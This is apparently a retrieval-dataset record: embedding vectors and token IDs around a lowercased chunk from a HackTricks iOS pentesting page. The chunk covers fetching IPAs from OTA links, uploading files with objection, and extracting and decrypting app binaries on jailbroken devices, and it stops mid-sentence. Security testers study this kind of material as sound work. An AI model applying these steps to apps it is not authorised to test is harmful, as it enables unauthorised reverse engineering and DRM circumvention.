0.5884409546852112, -0.4310542941093445, 0.23902949690818787, 0.2822677791118622, 0.9023430347442627, -0.2706677317619324, -0.7021384835243225, -0.0215772595256567, 0.3967415392398834, -0.17786794900894165, -0.11491741985082626, 0.13495121896266937, -0.25177469849586487, 0.3097730875015259, -0.6776795387268066, -0.794405460357666, -0.5751208662986755, 0.3389832675457001, -0.27539822459220886, -1.0319026708602905, 0.19086195528507233, -0.03371284157037735, -0.5174729228019714, -0.23000237345695496, 0.15339310467243195, 0.10668075829744339, 0.4825473129749298, -0.7710409164428711, -0.4639604091644287, -0.03465372323989868, 0.41544002294540405, -0.28237804770469666, 0.555000364780426, -0.3815150260925293, -0.038321856409311295, -0.33240437507629395, -0.8832294940948486, -0.3420773148536682, -0.0705244168639183, -0.42765942215919495, -0.42426592111587524, 0.3273342549800873, 0.3637253940105438, 0.4684518575668335, 0.2197319120168686, -0.05069897323846817, 0.25982150435447693, 0.25594183802604675, 0.9052897095680237, 0.16665923595428467, 1.0596849918365479, 0.8441007733345032, 0.24194692075252533, 0.4176013171672821, -0.3189760744571686, 0.595232367515564, -0.14942772686481476, 0.3088033199310303, -0.1956063210964203, -0.3669281601905823, -1.031514048576355, 0.19774682819843292, -0.30000945925712585, 0.3530592918395996, -0.4082129895687103, 0.4535900950431824, -0.7882431149482727, 0.15607884526252747, -0.5436068177223206, 0.40020474791526794, -0.44385936856269836, -0.1073216125369072, 0.23769548535346985, 0.38629859685897827, 0.377575159072876, -1.5074068307876587, 4.203437328338623, 0.6955759525299072, 0.033801496028900146, 1.047326922416687, 0.4978739321231842, 0.5640751123428345, 1.443355917930603, -0.6848192811012268, -0.14720143377780914, -0.7733630537986755, 0.08055760711431503, -0.7484763264656067, 0.3440040647983551, 0.11809591203927994, 0.40134742856025696, 1.0583076477050781, -0.4515747129917145, 0.3053390681743622, 1.148461103439331, -0.8289764523506165, -1.1027625799179077, -0.12271080911159515, -0.8377578854560852, 1.5555001497268677, 0.4044204652309418, 0.31927621364593506, 0.5478723645210266, -0.9128575325012207, -0.2566905617713928, -0.2512471079826355, 0.3484928607940674, -0.6131628751754761, 0.5106745958328247, -0.9625524282455444, -0.545718252658844, 0.7858060598373413, 0.3254752457141876, -0.7845550775527954, 0.13871100544929504, 0.8270086646080017, 0.3587566018104553, -0.2161470353603363, 0.5538852214813232, -0.2764204144477844, 0.046135079115629196, 0.5730603933334351, -0.642151415348053, 0.2971642315387726, 0.858725368976593, -0.9654853940010071, 0.8258188962936401, 0.21814453601837158, 0.9661758542060852, 0.3411664068698883, -0.4290695786476135, 0.10853380709886551, 0.3578762114048004, -0.22913363575935364, 0.28101688623428345, -0.585134744644165, 0.6180186867713928, -0.21169637143611908, 0.4954938590526581, -0.12763184309005737, -1.1269817352294922, 0.46093928813934326, 0.19101059436798096, 0.8251069784164429, 0.40883615612983704, -0.5413274765014648, -0.43901368975639343, -0.12830714881420135, -0.13299567997455597, -0.430726021528244, 0.4908900856971741, 0.2379121482372284, 0.05941278114914894, 0.38572728633880615, 0.6827139854431152, -0.7993977069854736, -0.41103070974349976, -0.5921697616577148, -0.7605552673339844, 0.5406553149223328, 0.660849392414093, 0.6129390597343445, -0.1922338604927063, -0.8417912721633911, -0.16585329174995422, 0.06747020035982132, 0.38887402415275574, 0.3766711950302124, -0.5000069737434387, 0.2698294222354889, 0.5314680337905884 ]
[ 5472, 8758, 1010, 2061, 5906, 2066, 2065, 4609, 8758, 1998, 29464, 2595, 24759, 5686, 2099, 2053, 2936, 4653, 1013, 12850, 6764, 2013, 18726, 5361, 2006, 1996, 5080, 2065, 1996, 5080, 3475, 1005, 1056, 7173, 29162, 1012, 2478, 22224, 2860, 10222, 2017, 2024, 3225, 22224, 1006, 22224, 1011, 1011, 11721, 24291, 4012, 1012, 6207, 1012, 4684, 3736, 14971, 2072, 10566, 1007, 2017, 2097, 2424, 1996, 25732, 2306, 1996, 14012, 14176, 1012, 8917, 1012, 27593, 3022, 2361, 1012, 5796, 2102, 2290, 2006, 1006, 18059, 1024, 2184, 1012, 1017, 1012, 1017, 1007, 1031, 18833, 1033, 1001, 1052, 21724, 6140, 10841, 14343, 3372, 14176, 1024, 1013, 13075, 1013, 16143, 1013, 14012, 1013, 4646, 1013, 4830, 29292, 2620, 26224, 2094, 1011, 4749, 2509, 2063, 1011, 4805, 2549, 2278, 1011, 1038, 28756, 2497, 1011, 1038, 2620, 2497, 2575, 2278, 22275, 2050, 2549, 2063, 2581, 2575, 1013, 8917, 1012, 27593, 3022, 2361, 1012, 5796, 2102, 2290, 1012, 10439, 8557, 1996, 4372, 2615, 3094, 2000, 2131, 1996, 2472, 3111, 1997, 1996, 10439, 1998, 22149, 2000, 1996, 5491, 14176, 1012, 8917, 1012, 27593, 3022, 2361, 1012, 5796, 2102, 2290, 2006, 1006, 18059, 1024, 2184, 1012, 1017, 1012, 1017, 1007, 1031, 18833, 1033, 1001, 3729, 1013, 13075, 1013, 4684, 1013, 16143, 1013, 2951, 1013, 4646, 1013, 5824, 2278, 2581, 11057, 26337, 1011, 1015, 2094, 23352, 1011, 1018, 26337, 2050, 1011, 1023, 2094, 2620, 2509, 1011, 1040, 2620, 2497, 2549, 2050, 2475, 2094, 22932, 17134, 2509, 1013, 5491, 1013, 13075, 1013, 4684, 1013, 16143, 1013, 2951, 1013, 4646, 1013, 5824, 2278, 2581, 11057, 26337, 1011, 1015, 2094, 23352, 1011, 1018, 26337, 2050, 1011, 1023, 2094, 2620, 2509, 1011, 1040, 2620, 2497, 2549, 2050, 2475, 2094, 22932, 17134, 2509, 1013, 5491, 24415, 1996, 3094, 5371, 8816, 1026, 5371, 18442, 1028, 2017, 2064, 8816, 1037, 5371, 2013, 1996, 16380, 5080, 2000, 2115, 3677, 3274, 1998, 2064, 17908, 2009, 5728, 1012, 8917, 1012, 27593, 3022, 2361, 1012, 5796, 2102, 2290, 2006, 1006, 18059, 1024, 2184, 1012, 1017, 1012, 1017, 1007, 1031, 18833, 1033, 1001, 5371, 8816, 1012, 4012, 1012, 6207, 1012, 4684, 1035, 11661, 1035, 3208, 1012, 27425, 1012, 20228, 2923, 7698, 18570, 1013, 13075, 1013, 4684, 1013, 16143, 1013, 2951, 1013, 4646, 1013, 5824, 2278, 2581, 11057, 26337, 1011, 1015, 2094, 23352, 1011, 1018, 26337, 2050, 1011, 1023, 2094, 2620, 2509, 1011, 1040, 2620, 2497, 2549, 2050, 2475, 2094, 22932, 17134, 2509, 1013, 1012, 4012, 1012, 6207, 1012, 4684, 1035, 11661, 1035, 3208, 1012, 27425, 1012, 20228, 2923, 2000, 1012, 4012, 1012, 6207, 1012, 4684, 1035, 11661, 1035, 3208, 1012, 27425, 1012, 20228, 5130, 25379, 2075, 5371, 2013, 5080, 1012, 1012, 1012, 3015, 27507, 2000, 7688, 1012, 1012, 1012, 5147, 22817, 1013, 13075, 1013, 4684, 1013, 16143, 1013, 2951, 1013, 4646, 1013, 5824, 2278, 2581, 11057, 26337, 1011, 1015, 2094, 23352, 1011, 1018, 26337, 2050, 1011, 1023, 2094, 2620, 2509, 1011, 1040, 2620, 2497, 2549, 2050, 2475, 2094, 22932, 17134, 2509, 1013, 1012, 4012, 1012, 6207, 1012, 4684, 1035, 11661, 1035, 3208, 1012, 27425, 1012, 20228, 2923, 2000, 1012, 4012, 1012, 6207, 1012, 4684, 1035, 11661, 1035, 3208, 1012, 27425, 1012, 20228, 2923, 29337, 2064 ]
hack_tricks
436.txt
3
also upload files to the ios device with file upload < local _ file _ path >. obtaining and extracting appsgetting the ipa file from an ota distribution linkduring development, apps are sometimes provided to testers via over - the - air ( ota ) distribution. in that situation, you'll receive an itms - services link, such as the following : itms - services : / /? action = download - manifest & url = https : / / s3 - ap - southeast - 1. amazonaws. com / test - uat / manifest. plistyou can use the itms services asset downloader tool to download the ipa from an ota distribution url. install it via npm : $ npm install - g itms - servicessave the ipa file locally with the following command : # itms - services - u " itms - services : / /? action = download - manifest & url = https : / / s3 - ap - southeast - 1. amazonaws. com / test - uat / manifest. plist " - o - > out. ipaacquiring the app binary1. from an ipa : if you have the ipa ( probably including an already decrypted app binary ), unzip it and you are ready to go. the app binary is located in the main bundle directory (. app ), e. g. payload / telegram x. app / telegram x. see the following subsection for details on the extraction of the property lists. on macos's finder,. app directories are opened by right - clicking them and selecting " show package content ". on the terminal you can just cd into them. 2. from a jailbroken device : if you don't have the original ipa, then you need a jailbroken device where you will install the app ( e. g. via app store ). once installed, you need to extract the app binary from memory and rebuild the ipa file. because of drm, the app binary file is encrypted when it is stored on the ios device, so simply pulling it from the bundle ( either through ssh or objection ) will not be sufficient to reverse engineer it ( read next section ). decryption ( manual ) unlike an android application, the binary of an ios app can only be disassembled and not decompiled. when an application is submitted to the app store, apple first veri
[ 0.3177025616168976, -0.01875218190252781, -0.8939383029937744, 0.5276546478271484, -0.718874990940094, -0.3191464841365814, -0.1198730543255806, -0.22128182649612427, 0.580147385597229, 0.992143988609314, -0.21040786802768707, 0.16024893522262573, 0.4790617823600769, -0.6236333250999451, -0.6637420058250427, 0.018818536773324013, -0.16251206398010254, -0.041833002120256424, -0.4178200662136078, -0.7381548285484314, -0.15688997507095337, 0.3200546205043793, -0.36125245690345764, -0.4461922347545624, -0.3462139964103699, 0.5746020078659058, 0.42213523387908936, 0.27998706698417664, 0.12886492908000946, 0.5628072023391724, 0.1268043965101242, 0.09418324381113052, -0.4723694622516632, -0.4299364686012268, 0.11331421881914139, -0.3084073066711426, 1.403109073638916, -0.36687007546424866, 0.6269398331642151, -0.695732831954956, -0.0057480596005916595, -0.19699373841285706, -0.028643330559134483, -0.3593253791332245, -0.4316478371620178, -0.5203952193260193, -0.07619276642799377, -0.6079156398773193, 0.7036747932434082, 0.5176063179969788, 0.009255222044885159, -0.023410266265273094, -0.19680893421173096, 0.19616712629795074, 0.16332899034023285, -0.5202619433403015, -0.11988203972578049, -0.22991204261779785, -0.19222687184810638, 0.3692798316478729, -0.199070006608963, 0.22865493595600128, 0.22835347056388855, -0.805683434009552, -0.01895648054778576, 0.08538861572742462, -0.07070031762123108, 0.1111064925789833, -0.29321208596229553, -0.5173867344856262, -0.9483924508094788, 0.6642614006996155, -0.22619308531284332, -0.3508472442626953, -0.5826719999313354, 0.06108050420880318, 0.11574806272983551, -0.3948369026184082, 0.34417515993118286, 0.6582929491996765, 0.13502468168735504, 0.5425176620483398, 0.10090821236371994, -0.1906898468732834, -0.6570754051208496, 0.31266865134239197, 0.44722461700439453, 0.5334853529930115, -0.02717602252960205, 0.08213663101196289, 0.4734683930873871, 0.5242146253585815, -1.0757920742034912, -0.4885983169078827, 0.35234734416007996, 0.7659554481506348, -0.6462308168411255, 0.2816886007785797, 0.26917213201522827, -0.37745845317840576, 0.4603833258152008, 0.286836713552475, 0.027652038261294365, 0.4217246472835541, -0.21497370302677155, 0.4426872432231903, 0.2617414891719818, -0.48028212785720825, -0.35567307472229004, -0.39038413763046265, 0.5840709209442139, 0.04880938678979874, 0.7521544098854065, -0.7859063744544983, -0.4871840178966522, 0.3083442151546478, 0.26817694306373596, 0.24503041803836823, -0.5489858984947205, 0.7623967528343201, 0.028309911489486694, -0.5633954405784607, 0.2951432764530182, -0.5872234106063843, 0.04627414047718048, -0.7579413652420044, 0.11749514937400818, 0.38410404324531555, -0.616890549659729, -0.3697780966758728, -0.07382530719041824, -0.3532179892063141, 0.18224811553955078, 0.9636242985725403, -0.08684367686510086, 0.06866757571697235, 0.6450604796409607, 0.12835945188999176, 0.7954510450363159, -0.33232608437538147, -0.12348129600286484, 0.567465603351593, 0.2816302478313446, 1.222603678703308, 0.18345405161380768, 0.3806488811969757, -0.3393131494522095, -0.23493604362010956, -0.39002326130867004, -0.1697598099708557, -0.35205310583114624, 0.4870262145996094, 0.45902594923973083, -0.08844871819019318, -0.48024964332580566, 0.5372663140296936, -0.48961296677589417, 0.3344672918319702, 0.17304082214832306, -0.01700063981115818, 0.09927627444267273, 1.0317206382751465, -0.11283430457115173, 0.13652923703193665, -0.21202312409877777, 0.023441001772880554, -0.5560157299041748, -0.5975532531738281, 0.14323949813842773, 0.2878810167312622, 0.04804680123925209, 0.4020463824272156, 0.34013602137565613, 0.021263107657432556, 0.6944625973701477, 0.8363840579986572, 0.5971773266792297, 0.11953381448984146, 0.3657968044281006, 0.26828089356422424, -0.9874454736709595, -0.08903900533914566, 0.13674873113632202, 0.3270728886127472, 0.12906955182552338, 0.5910897254943848, -0.1446770280599594, -0.6358608603477478, -0.4303971827030182, -0.5546826720237732, -0.24881623685359955, 0.7027162313461304, -0.5695357322692871, 0.3422969579696655, -0.17032502591609955, 0.0019767319317907095, -0.7321109175682068, -0.5545485019683838, -0.2965126931667328, -1.460727572441101, -0.9295597076416016, -0.07397182285785675, -0.1459415704011917, 0.061466384679079056, 0.12489619851112366, 0.31988680362701416, 0.45916134119033813, 0.8947829008102417, -0.06145700812339783, 0.29801270365715027, 1.1926976442337036, 0.1256180703639984, -0.541377067565918, 0.12836217880249023, 0.2084217667579651, -0.15257002413272858, 0.31348246335983276, 0.5157696604728699, 0.27237188816070557, 0.5105524659156799, -0.8520117998123169, 0.6172810196876526, 0.7482689023017883, -0.03959868103265762, -0.1571115404367447, -0.5265093445777893, -0.0069961524568498135, 0.3595268428325653, -0.8019338846206665, -0.19536906480789185, -0.4069359302520752, 0.10507210344076157, 0.8178200125694275, 1.1593252420425415, 0.3536953330039978, 0.022371264174580574, 0.2559659481048584, 0.1652112603187561, 0.4254692494869232, 0.044818583875894547, 0.23398417234420776, 1.0514459609985352, 0.4778233468532562, 0.4764876663684845, -0.05375213176012039, 0.11881690472364426, 0.025885548442602158, 0.18502557277679443, 0.07008028030395508, 0.6236813068389893, -0.7246370315551758, 1.09808349609375, 0.608971357345581, -0.013772992417216301, -0.5464584231376648, -0.4983806908130646, 1.2712376117706299, 0.9392640590667725, -0.9970322847366333, -0.7423297166824341, 0.46407270431518555, 0.0745692104101181, 0.09280204772949219, 0.1418161690235138, 0.24630552530288696, 0.8301820755004883, 0.0282677561044693, 0.1027739942073822, 0.2092106193304062, -0.49950873851776123, -0.8439240455627441, -0.3017193675041199, -0.9436717629432678, 0.08770951628684998, -0.47754523158073425, 0.1984788030385971, 0.30654799938201904, -0.5631106495857239, 0.4807506501674652, -0.5115525722503662, -0.4236230254173279, -0.35210660099983215, 0.33328285813331604, 0.5127569437026978, 0.3517109453678131, 0.18756529688835144, -0.9584759473800659, 0.7178416848182678, -0.3681544363498688, 0.7787479758262634, -0.1365557610988617, -0.07506565749645233, -0.28113436698913574, -0.169488325715065, -0.2105311006307602, -0.5967185497283936, 0.729402482509613, 0.4831785261631012, -0.11516246199607849, 0.21103136241436005, 0.8043404817581177, -0.13344337046146393, 0.12236670404672623, -0.03057885728776455, -0.449371874332428, 0.37531253695487976, 0.39450106024742126, -0.3261541426181793, 0.5255516767501831, 0.36273351311683655, -0.6200678944587708, 0.3860035240650177, 0.27450689673423767, -0.14914929866790771, -0.5595669150352478, 0.6071628332138062, 0.8559528589248657, -0.0266164168715477, 0.2907271981239319, 0.1248001977801323, -0.02233697474002838, -0.46539294719696045, -0.4664899706840515, -0.24245521426200867, 0.23773309588432312, -0.03162429854273796, 0.07999677956104279, -0.9519498348236084, -0.021377043798565865, -0.5220580101013184, -0.18632742762565613, -0.5800316333770752, 0.02344956062734127, 1.1272221803665161, -0.03490207716822624, 0.3902948498725891, -0.578849196434021, -0.40404844284057617, 0.40304234623908997, 0.14177206158638, -0.163110613822937, -1.0069854259490967, 0.40151846408843994, 0.40283167362213135, 0.09686875343322754, 0.8383932113647461, 0.577948272228241, -0.3319007456302643, 0.1986083984375, -0.3047080636024475, -0.5665932297706604, -0.3929838538169861, -0.03925328701734543, 0.14451183378696442, 0.28365081548690796, 0.7016310095787048, -0.41539761424064636, -0.39070746302604675, 0.015063637867569923, 0.10179082304239273, -0.29985862970352173, -0.2067689299583435, 0.1303592175245285, 0.04718418046832085, -0.1934148371219635, -0.389924019575119, -0.13763120770454407, 0.33606427907943726, 0.7312738299369812, -0.7887191772460938, 0.3003273904323578, -0.018218467012047768, 0.05724194645881653, 0.35695144534111023, -0.5045386552810669, -0.3314375877380371, 0.743813693523407, -0.24045518040657043, 0.5255438685417175, -0.6782683730125427, 0.13682153820991516, -0.05112243816256523, -0.17766958475112915, 0.6028178930282593, 0.5532441139221191, -0.4217958450317383, -0.48458799719810486, -0.3633781969547272, 0.09015469998121262, 0.1364017128944397, 0.16443414986133575, 0.2360350787639618, 0.5105373859405518, -0.6419568061828613, -0.6005789637565613, -1.7201679944992065, 0.871290922164917, 1.2026376724243164, 0.8086779713630676, 0.6834313869476318, 0.8774251937866211, 0.11657124757766724, -0.07391320168972015, -0.006456540897488594, -0.4589453339576721, 0.25537824630737305, -0.053592249751091, 0.9350571036338806, -0.7533657550811768, -0.2713334560394287, -0.21289905905723572, -0.6643879413604736, -0.7672924995422363, 0.29779526591300964, 0.41125693917274475, 0.3002769947052002, -0.7346453666687012, -0.20799611508846283, -0.22394943237304688, 0.18965710699558258, -0.3120743930339813, -0.06107748672366142, -0.25569114089012146, 0.24676787853240967, 0.4069029688835144, -0.7738507390022278, 0.39545905590057373, -0.18679706752300262, 0.17507261037826538, 0.5659729242324829, 0.29060110449790955, -0.4169078767299652, -0.1889168918132782, -0.21504291892051697, -0.7380688190460205, 0.2525119483470917, 0.546342134475708, 0.405615895986557, -0.08774805814027786, -0.8925337791442871, -0.07569878548383713, 0.8736692667007446, -0.37443384528160095, -0.7859550714492798, -0.37374961376190186, -0.04412407428026199, 0.5075156688690186, 0.3615720570087433, -0.491202712059021, 0.1141807809472084, 0.4746537506580353, -0.6583619713783264, 0.87863689661026, -0.540788471698761, 0.3075156509876251, 0.6358481645584106, -0.37462612986564636, -0.03496415540575981, 0.36040830612182617, -0.7750468254089355, 0.27640706300735474, -0.02827758714556694, 0.09954968094825745, -0.2757253348827362, -0.28812175989151, 0.8109027147293091, -0.4763757586479187, -0.09050177782773972, 0.21465353667736053, 0.15155820548534393, -0.09399738162755966, 0.5710989236831665, -0.4849644601345062, -0.5464677214622498, 0.6260543465614319, -0.43183690309524536, 0.32178521156311035, -0.036879636347293854, 0.18388035893440247, 0.006359875667840242, -0.33989596366882324, 0.5802345275878906, 0.39358532428741455, 0.6835373640060425, -0.7603683471679688, -0.3195682168006897, 0.11482404917478561, -0.03079366125166416, -0.06050988659262657, 0.3355986773967743, 0.1100359708070755, -0.21719299256801605, -0.25855186581611633, -0.17897900938987732, -0.7078710198402405, -0.7806077003479004, -0.11752340942621231, -0.3147265315055847, -0.22611217200756073, -0.13992628455162048, 0.3960435092449188, -0.33382803201675415, -0.3985484540462494, 0.4242040812969208, 0.03287507966160774, 0.5260796546936035, -0.7610606551170349, 0.2982821762561798, -0.2338966578245163, -0.05736972764134407, -0.20505265891551971, 0.6370118260383606, -0.232254758477211, 0.34638386964797974, 0.002580326749011874, 0.571954071521759, -0.11735116690397263, -0.012283231131732464, -0.7925154566764832, 0.3762236535549164, 0.119865782558918, -0.419198602437973, -0.22506892681121826, 0.26740890741348267, -0.058503158390522, 0.08945707976818085, 0.034980613738298416, -0.22347275912761688, -0.8637659549713135, -0.9085473418235779, 0.5954388976097107, -0.01117650605738163, 0.5033997297286987, -1.0028436183929443, -0.31966426968574524, -0.04499358683824539, 0.5212327837944031, -0.2364157736301422, -0.7423052787780762, 0.12416613101959229, -0.055635735392570496, 0.030257364735007286, -0.24606481194496155, -0.32976076006889343, -0.21897199749946594, -0.012968919239938259, 0.08833220601081848, 0.7767190933227539, 0.33397090435028076, -0.4078107476234436, 0.1283034235239029, 0.07300077378749847, 0.18044613301753998, -0.16436821222305298, -0.7465875148773193, -0.4764541685581207, -0.21110102534294128, -0.19429583847522736, -0.4374881982803345, 0.7550893425941467, -0.6896035671234131, 0.8333503603935242, -0.0064733256585896015, -0.31715986132621765, -0.06824395805597305, -0.24102537333965302, -0.2155938297510147, 0.29873162508010864, 0.6201764345169067, -0.7643777132034302, -0.32409292459487915, 0.1465427577495575, 0.6386168599128723, 0.4929612874984741, -0.24934923648834229, -1.092254638671875, -0.19097205996513367, -0.459614098072052, -0.9523085951805115, 0.238248810172081, -0.14702636003494263, -0.08560363203287125, -0.14847497642040253, -0.24907244741916656, 0.44210031628608704, -0.18703146278858185, 0.2402270883321762, 1.4831496477127075, 0.4186986982822418, 0.10630131512880325, -0.8181369304656982, 0.8963804841041565, 0.8858606219291687, 0.01767858862876892, 0.2599930465221405, -0.458528608083725, 0.4876742362976074, -0.5460612773895264, -0.249779611825943, 0.2519962191581726, -0.6823532581329346, -0.5556910037994385, 0.41338393092155457, -0.16762502491474152, -0.05831452086567879, 0.23600898683071136, -0.8124280571937561, -0.021123455837368965, 0.02126680500805378, 0.24446336925029755, -0.035237789154052734, 0.6231915354728699, 0.47296521067619324, 0.12392926961183548, -0.2289910465478897, -0.32750388979911804, 0.05786401778459549, -0.48351559042930603, 0.4437596797943115, -0.044368840754032135, -0.8609583973884583, 0.9881302118301392, 0.43098610639572144, -1.1259976625442505, -0.4358063340187073, -0.2609502971172333, 0.03135019168257713, -0.08420255780220032, -0.20134572684764862, -0.2306617647409439, 0.11454536020755768, 0.15375776588916779, -0.24925822019577026, 0.15383972227573395, -0.039092760533094406, 0.46144697070121765, -0.8076767325401306, 1.043135404586792, 0.13013949990272522, -0.04944361373782158, 0.48505356907844543, -1.0883901119232178, -0.5143413543701172, -1.0904651880264282, -0.10189956426620483, 0.12633749842643738, 0.01908877305686474, 1.0244053602218628, -0.19622917473316193, 0.5370458364486694, -0.31561803817749023, -0.18033665418624878, 0.41725948452949524, -0.14600852131843567, -0.026407791301608086, 0.7285940647125244, 0.23900175094604492, -0.8195288181304932, -0.792698323726654, 0.5611297488212585, 0.14010053873062134, 0.8568239808082581, -0.7528858184814453, -0.26204824447631836, -0.06001861020922661, 0.14076049625873566, 0.45100146532058716, -0.771016538143158, -0.6087075471878052, -0.8977195024490356, 0.08851014077663422, -0.3423019051551819, -0.07397232204675674, -0.6623473167419434, 0.3919657766819, 0.4946317672729492, -0.9211833477020264, 0.42614006996154785, -0.15318119525909424, -0.16113150119781494, -0.48576676845550537, -0.804622232913971, 0.6759133338928223, -0.44788292050361633, -1.1826496124267578, -1.0332012176513672, -0.023467078804969788, -0.22690148651599884, -0.17288120090961456, -0.5948028564453125, -0.25030893087387085, -0.9095311760902405, 0.6799978613853455, -0.3723407983779907, -0.36205050349235535, 0.3517313599586487, -0.2402210831642151, 0.30695173144340515, 0.8118036389350891, -0.3544546663761139, -0.24191530048847198, 0.522907018661499, 0.4408028721809387, 0.6082955002784729, -0.2922094166278839, 0.06284207850694656, -0.28542667627334595, 0.5293799042701721, 0.44982659816741943, 0.06695941835641861, -0.47274428606033325, -0.05837731435894966, 0.2766067087650299, -0.5316525101661682, 0.04838906601071358, -0.5854986906051636, 0.35804399847984314, 0.495041161775589, 0.1505301594734192, -0.4295492470264435, 0.7484481334686279, 0.6656417846679688, 0.4150885045528412, -0.550014317035675, 0.6692885756492615, 0.4660637676715851, -0.06983231753110886, -0.49683550000190735, -0.058095186948776245, 0.08101069182157516, -0.39015471935272217, -0.2008601576089859, 0.11869233846664429, -0.25550559163093567, 0.5719258785247803, -0.3863570988178253, -0.011621462181210518, -0.509455680847168, -0.2990468144416809, 0.2184496819972992, 0.1435108482837677, 0.10184560716152191, -0.014918141067028046, 0.4792238175868988, -0.14560531079769135, -0.7959867119789124, 0.015758659690618515, -0.4534080922603607, -0.33829277753829956, 0.2192349135875702, -0.3356792628765106, -0.2692476212978363, -0.36896243691444397, 0.12603314220905304, 0.17330700159072876, 0.21364718675613403, -0.2795969843864441, 0.11269776523113251, -0.02556850202381611, 0.3275800049304962, 1.0721254348754883, -0.6707786917686462, -0.11080648005008698, -0.5817081928253174, 0.8395050168037415, -0.7974258661270142, -0.658430278301239, 0.46871456503868103, 1.2036212682724, 0.7785983085632324, -0.42079752683639526, 0.0034347479231655598, 0.07078110426664352, 0.5273816585540771, 0.08065910637378693, 0.3356229364871979, -0.23878121376037598, -0.6144894957542419, 0.08008209615945816, -0.6867154240608215, -0.10221746563911438, 0.018488645553588867, -0.44329577684402466, 0.28740039467811584, 0.10000795871019363, -0.31483304500579834, 0.015625400468707085, 0.10405978560447693, 0.017410555854439735, 0.3307594060897827, 0.17210766673088074, 0.9639641046524048, -0.4396137595176697, -0.14327885210514069, -0.6210595965385437, 0.4355182945728302, 0.2508174777030945, 0.4138602912425995, -0.25722798705101013, -0.01316074188798666, 0.2863098084926605, -0.8949074149131775, -0.10861671715974808, 0.9709315896034241, 0.5576791763305664, -0.1836523860692978, 0.47423988580703735, -0.7049359083175659, -0.06305619329214096, 0.0905955582857132, -0.5908749103546143, 0.83269202709198, 0.25729018449783325, -0.17661571502685547, -0.20157022774219513, 0.14360052347183228, 0.6889113783836365, -0.7277511954307556, 0.13121141493320465, 0.10140593349933624, 0.1900213658809662, 0.10181568562984467, -0.15127241611480713, -0.4356172978878021, 0.24237489700317383, 0.7504871487617493, 0.14085568487644196, 0.21019762754440308, 0.3015784025192261, -0.28161880373954773, 0.08269823342561722, 0.48535212874412537, 0.05416824296116829, -0.7073066830635071, -0.6325339078903198, 0.3556188642978668, -0.10222870856523514, -0.8794735670089722, -0.32852885127067566, 0.4013877511024475, -0.5422108173370361, 0.7558823227882385, -0.39763525128364563, -0.17380070686340332, -0.7673969268798828, 0.20912979543209076, -0.3728288412094116, 0.11886246502399445, 0.6859710216522217, -0.6177599430084229, -0.4657531678676605, 0.9211568832397461, -0.007017381954938173, 0.25514742732048035, -0.4391646981239319, 0.487578421831131, 0.18775512278079987, 0.6445839405059814, -0.23938092589378357, -0.7157125473022461, -0.5435664653778076, 0.0572698637843132, -0.27164071798324585, -0.4890989065170288, 0.4748682379722595, -0.6819252967834473, 0.5581796765327454, -0.7041341662406921, -0.50616455078125, -0.8431918025016785, -0.5810629725456238, -0.617800772190094, -0.5662005543708801, -0.013249565847218037, -0.18122439086437225, -0.4839838445186615, 0.030971184372901917, 0.14191392064094543, 0.6445187926292419, 0.11923550814390182, -0.3581363260746002, -0.302018404006958, -0.41827940940856934, -0.6699011921882629, -0.0969836562871933, 0.7517001032829285, -0.28591740131378174, -0.06696972250938416, 0.7001409530639648, -0.8492346405982971, -0.5291315913200378, 0.37958911061286926, -0.4924754202365875, -0.19679726660251617, 0.6155157089233398, 0.05146903172135353, 0.8696876168251038, 0.1510440558195114, -0.16572831571102142, -0.1377701759338379, -0.01459870021790266, 0.761040985584259, -0.11367841064929962, 1.2743663787841797, 0.26725849509239197, -0.2502531409263611, -0.06660392880439758, 0.18089506030082703, 0.14776897430419922, -0.3704877197742462, -0.468245267868042, -0.4321042597293854, -0.19194278120994568, -1.2949731349945068, -0.5311908721923828, -0.5483129620552063, -0.4278407394886017, 0.3590094745159149, 0.42832738161087036, -0.9183890223503113, 0.6612852811813354, -0.8073565363883972, -0.04308410733938217, -0.17303858697414398, -0.4133288860321045, 0.04463382810354233, -0.15904183685779572, 0.784819483757019, -1.0574218034744263, 4.3789544105529785, 0.6240633726119995, -0.08870511502027512, 0.45579516887664795, -0.13844087719917297, 0.35573622584342957, 1.4190915822982788, -0.8217630982398987, 0.38474810123443604, -0.5029259324073792, 0.1773425042629242, -0.4304899275302887, 0.6351367831230164, 0.3756009042263031, 0.25781750679016113, 0.4976249635219574, -0.27567222714424133, 0.5057459473609924, 0.5020744204521179, -1.4328975677490234, -0.9937217235565186, 0.33760130405426025, -0.5389778017997742, 0.8129205703735352, 0.46865400671958923, 0.013796125538647175, 0.6689774394035339, -0.46383076906204224, 0.5055831074714661, -0.3331252932548523, -0.09248117357492447, -0.20847401022911072, -0.21193210780620575, -1.1036972999572754, -0.3319902718067169, 0.5144986510276794, 0.256976455450058, -0.6243810653686523, 0.04573856294155121, 0.15309633314609528, 0.4183136224746704, -0.05050746724009514, 0.6625850200653076, -0.02042504958808422, 0.6629409790039062, 0.7293734550476074, -0.18532688915729523, 0.2962687015533447, 0.7873139381408691, -0.23860104382038116, 1.0021040439605713, -0.6019951701164246, 0.765558123588562, 0.010440358892083168, -0.7939977049827576, 0.540727972984314, 0.14806832373142242, -0.3136885464191437, -0.27224090695381165, -0.26462435722351074, 0.6811383366584778, -0.8247327208518982, 0.1899423450231552, 0.07108401507139206, -0.678875744342804, 0.5457803606987, -0.4445495009422302, 0.4158083498477936, 0.7838593125343323, -0.01730281114578247, -0.6237900853157043, -0.012467175722122192, -0.7384119629859924, -0.8465930223464966, 0.4935978055000305, -0.3529788553714752, 0.2333408147096634, 0.6775097250938416, 0.18620294332504272, -0.49429839849472046, 0.0511527843773365, -0.25021082162857056, -0.26403963565826416, 0.5332601070404053, 0.6503921747207642, 0.6123934388160706, -0.288002073764801, -1.0346252918243408, -0.09901142865419388, 0.15338587760925293, 0.6797758340835571, -0.1071435883641243, -0.38646069169044495, -0.2573840916156769, 0.2715747356414795 ]
